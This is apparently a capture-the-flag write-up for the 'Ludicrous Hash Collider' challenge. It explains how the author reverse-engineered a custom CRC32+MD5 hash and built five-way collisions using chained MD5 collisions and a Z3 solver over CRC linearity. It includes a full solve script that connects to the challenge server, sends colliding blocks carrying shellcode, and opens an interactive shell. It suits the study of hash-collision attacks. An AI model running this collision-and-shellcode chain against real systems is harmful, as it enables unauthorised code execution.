LHC writeup by tomcr00se

*** tomcr00se presents a Ludicrous Hash Collider writeup ***

Include obligatory reference to my soundcloud

== Intro ==

Yay, pwning and crypto in one, I was excited. Except, like the cake, it turns out the pwning was a lie. At least I didn't find an exploit. You actually have to find, not just two, but five different inputs that all hash, using the ludicrous ZHA1, to the same value.

I spent like 8 hours on this problem, almost sunk my CTF. But it didn't.

== What's asked of you ==

geohot@dasher:~$ nc 109.233.61.11 30483
LHC: Ludicrous Hash Collider
An hour of this challenge binary working costs CTF organizers $0.000001.
We don't want to waste our money, so you're required to spend some cycles too.

As the proof of work, give me 5 different blocks of length 5588 with same ZHA1 hash.
Send block 0

Like I said in the intro, make things collide. The length varies randomly from 0 to 15000.

== ZHA1 (the custom hash function) ==

You are given a 64-bit binary, "lhc_old", which contains the hash function. After painful reversing, since it's 64-bit, and there's no 64-bit hexrays, it works like this.

def zha1(dat):
  def crc(d):
    return (~zlib.crc32(d)) & 0xFFFFFFFF

  ff = struct.unpack("I", dat[0:4])[0]

  tdat = struct.pack("I", 0xFFFFFFFF & (ff ^ (bs * 0x1337D00D)))
  tdat += dat[4:]
  top = struct.pack("I", crc(tdat)^bs)

  print top.encode("hex"), hashlib.md5(tdat).hexdigest()

So it basically is a CRC32 and MD5 combined, with the first 4 bytes tweaked a little based on the length. This tweaking is done so you can't reuse your work, since the length is random. Your input needs to collide in /both/ MD5 and CRC32, a multicollision.

== Colliding MD5 and the "construction" ==

Start simple, how do you get 5 things to MD5 to the same value. Seen in a CTF before. There is a tool, fastcoll, which given an input, generates two output files, starting with the input, that hash to the same value.

Remember your Merkle Damgard. MD5 takes in two things, a 128-bit input IV and 0x40 bytes of data, and outputs a 128-bit hash. The IV is the sum of the previous blocks hashes and 0123456789abcdeffedcba9876543210. So the program pads your input to a multiple of 0x40, and adds two more carefully crafted blocks to each file, which, despite the blocks added to each file being different, output the same hash. Call these two block groups(0x80 bytes each), B1 and B2.

Now we construct, starting with code, which can be anything. md5(code+B1) == md5(code+B2). But we can run the program again over code+B1, giving us two more block groups, C1 and C2, md5(code+B1+C1) == md5(code+B1+C2). But since md5(code+B1) == md5(code+B2), md5(code+B1+C1) == md5(code+B2+C1). See why? Merkle!

Keep doing this, and in O(n) time, you can generate 2^n collisions. {[B1, B2], [C1, C2], [D1, D2], ...}, pick one of each. For example, md5(code+B2+C2+D1) == md5(code+B1+C2+D1). Since 5 < 2^3, seems like we have to do this 3 times.

== Oh but what about the CRC? ==

After carefully reading a crypto paper, I conclude that with about 2^16 collisions in MD5, one of those pairs should collide in CRC32. Birthday attack, right? Okay maybe it'll take like 2^18 or 2^20 or something to make pretty sure I'll get it. So I tried. Generate 2^20(gotta be safe) collisions as above, CRC32 them all, and track and find the ones that collide. Such cake, I did it in Python.

== WTF THEY AREN'T COLLIDING, YOU MAKE ME WRITE C++ FOR A CTF ==

CRC is very good at detecting small bit errors, which is what MD5 collisions are. So none of the 2^20 messages collided in CRC space. I tried up to 2^24 in Python before eating all the ram in my laptop. Granted, I didn't do this efficiently.

Well fine, if 2^24 don't collide, I know what has to collide. 2^33. There's only 2^32 damn numbers, by the pigeon hole principle this has to work. Searching 2^33 space, 4 bytes for each, two arrays, is ... 16GB of RAM. Good thing I just bought a machine with 64GB for my work on the Hutter Prize. Useless C++ code included below.

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <zlib.h>

uint32_t blocks[33][2][32];

int main() {
  FILE *f = fopen("blocks", "rb");
  int len = fread(blocks, 1, 33*2*32*4, f);
  printf("%d\n", len);
  fclose(f);

  int *bigcrc = (int *)calloc(1LL << 32, 4);
  int *nextcrc = (int *)calloc(1LL << 32, 4);
  printf("crc initted\n");

  bigcrc[0] = 1;

  for (int j = 0; j < 32; j++) {
    printf("doing crc bullshit round %d\n", j);
    uint32_t *msg1block = blocks[j][0];
    uint32_t *msg2block = blocks[j][1];

    int ccount = 0;

    for (long long i = 0; i < 1LL << 32; i++) {
      if (bigcrc[i] != 0) {
        ccount++;
        uint32_t nc1 = crc32(i, (unsigned char *)msg1block, 0x80);
        uint32_t nc2 = crc32(i, (unsigned char *)msg2block, 0x80);

        // hmm i think this check is wrecking the cache
        if (nextcrc[nc1] != 0 || nextcrc[nc2] != 0) {

          int c1,c2;
          if (nextcrc[nc1] != 0) {
            c1 = nc1;
            c2 = bigcrc[i]<<1;
          } else if (nextcrc[nc2] != 0) {
            c1 = nc2;
            c2 = (bigcrc[i]<<1) | 1;
          }
          printf("FOUND COLLISION!!! %x %x %x\n", c1, nextcrc[c1], c2);
          return 0;
        }
        nextcrc[nc1] = bigcrc[i] << 1;
        nextcrc[nc2] = (bigcrc[i] << 1) | 1;
        bigcrc[i] = 0;
      }
    }
    printf("crc count is 0x%X\n", ccount);

    int *tcrc = bigcrc;
    bigcrc = nextcrc;
    nextcrc = tcrc;
  }
}

This worked, but it took like an hour to run. The CRC indexed accesses are all over memory, totally thrashing my cache. And this is only 2 colliding messages, I need 5. New approach is required. Ignore this whole section, the title was in CAPS, did you really expect something good?

== Calm down, go eat tacos, and use your mind to pwn instead of your 64GB of ram ==

After reading a confusing ass paper about CRC, I learned something today. CRC is linear, and that implies something cool.

crc("\x00\xBB") ^ crc("\xAA\x00") == crc("\xAA\xBB")
# and therefore
crc(B1 + len(C1)*"\x00") ^ crc(len(B1)*"\x00" + C1) == crc(B1 + C1)

The problem is now reduced to, given n pairs of numbers, find two distinct sets, picking a number from each pair, such that reduce(xor, set1) == reduce(xor, set2). Sounds vaguely NP, but our friend Z3 is good at doing NP things quickly.

== Umm, how do I use this Z3 thing again? ==

Poorly, but like this. Don't make fun too much, this is only my second time.

import os
import zlib
from z3 import *

def construct(x, c, a, b):
  for i in range(0, 32):
    if (a >> i)&1 == 1 and (b >> i)&1 == 1:
      x[i] = Xor(x[i], True)

    if (a >> i)&1 == 0 and (b >> i)&1 == 1:
      x[i] = Xor(x[i], c)

    if (a >> i)&1 == 1 and (b >> i)&1 == 0:
      x[i] = Xor(x[i], Not(c))

def crc(dat):
  return ~zlib.crc32(dat, 0xFFFFFFFF)

a = open("blocks").read()
maxi = len(a)/(0x100)

s = Solver()
ba = []
blocks = []

x = BoolVector('x', 32)
y = BoolVector('y', 32)

for i in range(32):
  x[i] = False
  y[i] = False

c1 = BoolVector("c", maxi)
c2 = BoolVector("d", maxi)

c = [c1,c2]
blocks = []

for i in range(0, maxi):
  ab = [0,0]
  tb = []
  for j in range(0, 2):
    tb.append(a[i*0x100+j*0x80:i*0x100+j*0x80+0x80])
    dat = "\x00"*(i*0x80)+tb[-1]+"\x00"*((maxi-i)*0x80)
    ab[j] = crc(dat)
  ba.append(ab)
  blocks.append(tb)

  construct(x, c[0][i], ab[0], ab[1])
  construct(y, c[1][i], ab[0], ab[1])

for i in range(32):
  s.add(x[i] == y[i])

# I know this isn't all of them, I was lazy.
s.add(Or(c[0][0] != c[1][0], c[0][1] != c[1][1], c[0][2] != c[1][2], c[0][3] != c[1][3],
         c[0][8] != c[1][8], c[0][9] != c[1][9], c[0][10] != c[1][10], c[0][11] != c[1][11],
         c[0][12] != c[1][12], c[0][13] != c[1][13], c[0][14] != c[1][14], c[0][15] != c[1][15],
         c[0][4] != c[1][4], c[0][5] != c[1][5], c[0][6] != c[1][6], c[0][7] != c[1][7]))

things = ["", ""]

print "solving"

# 10 minutes z3 you're on
# slim shady only got 6 minutes
s.set("timeout", 1000 * 60 * 10)
if s.check() == sat:
  print "satted"
  m = s.model()
  print m
  x = [0,0]
  for i in range(0, maxi):
    for j in range(0, 2):
      idx = 0
      # wtf man it's late, str()
      if str(m.evaluate(c[j][i])) == "True":
        idx = 1
      things[j] += blocks[i][idx]
      x[j] ^= ba[i][idx]

  if things[0] != things[1]:
    print "yay"
  print crc(things[0])
  print crc(things[1])
  print x
  open("out1", "wb").write(things[0])
  open("out2", "wb").write(things[1])
else:
  print "can't sat"

== Putting it all together ==

Note it's all done 3 times, the same length extension stuff works with CRC as well, like if crc(a) == crc(b) then crc(a+m) == crc(b+m). But also note that since CRC is linear, if crc(a) != crc(b), there exists no m such that crc(a+m) == crc(b+m), which isn't true for MD5.

import time
import socket
import hashlib
import struct
import os
import telnetlib
from hexdump import hexdump

# the old version handed out wants a string for system()
# the new one wants shellcode
import libshellcode
sc = libshellcode.gen("x86-64", "stupid")

def r():
  time.sleep(1)
  return s.recv(8192)

while 1:
  s = socket.create_connection(("109.233.61.11", 30483))
  dat = r()
  print dat
  bs = int(dat.split("\n")[3].split(" ")[12])
  print "block size is",bs

  print "genning files"
  f = open("tmp", "wb")
  code = sc
  code = struct.pack("I", 0xFFFFFFFF & (struct.unpack("I", code[0:4])[0] ^ (bs * 0x1337D00D))) + code[4:]
  code += (0x1C0 - len(code)) * "\x00"
  f.write(code)
  f.close()

  if bs < (0x1C0 + 0x80 * 37 * 3):
    print "too small :("
    continue
  break

c = [] 

# 5 < 2^3
for i in range(3):
  try:
    os.unlink("out1")
    os.unlink("out2")
  except:
    pass

  # z3 is shitty sometimes
  while not os.path.isfile("out1"):
    # fastcoll c++ was hacked to generate 37 chained colliding blocks
    os.system("clone-fastcoll/fastcoll tmp")
    # umm yea, I os.systemed python
    os.system("python z3/bin/crcsolve.py")
  h1 = open("out1").read()
  h2 = open("out2").read()
  c.append([h1, h2])
  os.unlink("tmp")
  f = open("tmp", "wb")
  f.write(code)
  for l in c:
    f.write(l[0])
  f.close()

# any 5 will do
ff = [code + c[0][0] + c[1][0] + c[2][0],
      code + c[0][0] + c[1][0] + c[2][1],
      code + c[0][0] + c[1][1] + c[2][0],
      code + c[0][0] + c[1][1] + c[2][1],
      code + c[0][1] + c[1][0] + c[2][0]]

for i in range(0,5):
  dat = ff[i]
  print hashlib.md5(dat).hexdigest()
  dat = sc[0:4] + dat[4:]
  # pad with "a"
  dat += (bs - len(dat)) * "a"
  s.send(dat)
  print r()

print "** interact **"
t = telnetlib.Telnet()
t.sock = s
t.interact()

== Wrapping it up ==

The thing was running in a chroot with only /bin/sh, so when I typed ls and got nothing, I assumed my shellcode didn't work. I thrashed for a bit, tried different shellcode(with like 20 minutes for each attempt), all to no avail. stderr was not redirected to the socket, so I didn't get errors. PROTIP: always try "pwd" first.

I used /bin/sh builtins to read the flag. I'd post them but I don't remember.

***************

With transparency, love, and rap songs from
~tomcr00se